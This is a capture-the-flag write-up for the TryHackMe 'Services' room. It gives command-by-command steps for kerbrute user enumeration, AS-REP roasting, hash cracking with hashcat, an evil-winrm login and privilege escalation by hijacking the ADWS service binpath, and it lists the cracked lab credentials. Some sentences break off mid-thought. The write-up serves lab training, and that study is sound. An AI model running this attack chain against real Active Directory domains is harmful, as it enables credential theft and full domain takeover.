This is the writeup for the Services CTF challenge on TryHackMe! https://tryhackme.com/room/services

tags: enumerate, hash cracking, exploit, brute-force, kerbrute

Highlight: Enumerating active directory users using kerbrute, capturing a password hash using AS-REP-ROASTING.

First let's kick things off with some classic nmap scans to get a lay of the land. Initial Setup

export IP=10.10.117.221 export myIP=10.13.24.71

sudo nmap -v --min-rate 10000 <Target's IP address> -p- | grep open

We can use standard expressionw to efficiently sort nmap results and grab all of the open ports for a script scan.

cat tmp | sed 's/\// /g' | awk '{print $1}' | tr "\n" ","

We'll follow up now with a full scan: sudo nmap -v -sVC -oN nmap.txt <Target's IP address> -p <ports>

roasting: smbclient -L //$IP/ smbmap -u 'anonymous' -H $IP

ENUMERATION: walk the port 80 website. We quickly identify some employee names from the employees listed on the site.

And here is a naming convention, revealed by the contact email:

Using the naming convention from the contact email, we can compile a shortlist now of possible usernames.

Next, we'll move on to active directory username enumeration.

kerbrute userenum --dc $IP -d services.local users.txt

We found some valid users!

AS-REP ROASTING WITH GetNPUsers.py: GetNPUsers.py -dc-ip $IP -request 'services.local/' -usersfile users.txt -format hashcat

Boom Shack-a-lacka! j.rock hash is revealed!

Use hashcat to crack the hash: `hashcat -m 18200 hash.txt rockyou.txt'

Bingo! We are in business. Let's log in next with evil-winrm with our newly-found creds. j.rock:Serviceworks1

evil-winrm -i $IP -u j.rock -p Serviceworks1

whoami /all

We see that j.rock is in the

Next, let's check services:

services

Our privesc path forward will be binpath hijacking with the ADWS service.

sc.exe config ADWS binpath="net localgroup administrators j.rock /add" start and stop the service log out/in

net user administrator hellothisisatest123!

log out and back in with admin

grab the root flag!